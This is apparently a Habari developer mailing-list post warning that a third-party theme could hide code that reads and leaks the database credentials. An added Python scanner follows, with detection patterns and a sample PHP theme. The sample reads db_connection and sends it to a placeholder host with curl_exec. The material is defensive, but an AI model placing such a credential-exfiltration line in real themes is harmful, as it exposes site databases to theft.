Say I build a theme.
Theme.xml contains legitimate stuff, but index.php (and perhaps the
other files) contain some less-than-good stuff under the hood.
It looks like an acceptable theme when you see the screenshot & when
you download it, you activate it & look at your theme to marvel at its
greatness. BUT: somewhere hidden in the theme is this little gem:
<?php
$str = Config::get('db_connection');
** Insert cross-site scripting here **
?>
Now your database info has been sent to another site & anybody who
reads it on that other site can get into your database & mess around
in it.
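As an added illustration (not code from the original post or from the Habari project): a small static check a site owner could run over a downloaded theme before activating it, flagging the read of the database connection config that the post describes together with any outbound network primitives in the same theme. Only the Config::get('db_connection') pattern comes from the post; the other patterns are assumptions about common PHP calls used to ship data off-site, and the sample theme is constructed.

```python
import re

# Things a reviewer would want to see in a third-party theme before activating it.
# "reads DB config" is the post's own example; the rest are assumed PHP primitives
# that a theme has no business calling.
SUSPICIOUS_PATTERNS = {
    "reads DB config": re.compile(r"Config::get\(\s*['\"]db_connection['\"]\s*\)"),
    "outbound HTTP": re.compile(r"\b(curl_init|curl_exec|fsockopen)\s*\("),
    "remote fetch/write": re.compile(r"\b(file_get_contents|file_put_contents|fopen)\s*\(\s*['\"]https?://"),
    "sends mail": re.compile(r"\bmail\s*\("),
    "dynamic code": re.compile(r"\b(eval|base64_decode|system|exec|passthru|shell_exec)\s*\("),
}


def scan_theme(files):
    """files: dict of relative path -> source text (what you'd get by unpacking
    the theme archive). Returns a list of (path, line_no, reason, line)."""
    findings = []
    for path, source in sorted(files.items()):
        if not path.endswith(".php"):       # theme.xml and assets carry no PHP
            continue
        for no, line in enumerate(source.splitlines(), 1):
            for reason, pattern in SUSPICIOUS_PATTERNS.items():
                if pattern.search(line):
                    findings.append((path, no, reason, line.strip()))
    return findings


def touches_db_config(findings):
    """True when the theme reads the DB config at all; a theme should never need to."""
    return any(reason == "reads DB config" for _, _, reason, _ in findings)


# Constructed sample: theme.xml looks harmless, index.php hides the credential grab
# and a call out to a placeholder host.
SAMPLE_THEME = {
    "theme.xml": '<?xml version="1.0"?><pluggable type="theme"><name>Shiny</name></pluggable>',
    "index.php": """<?php
// ordinary template output
echo '<html><body>';
$str = Config::get('db_connection');
curl_exec(curl_init('http://collector.invalid/?c=' . urlencode(serialize($str))));
?>""",
}

if __name__ == "__main__":
    for path, no, reason, line in scan_theme(SAMPLE_THEME):
        print(f"{path}:{no}: {reason}: {line}")
```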
For more options, visit this group at http://groups.google.com/group/habari-dev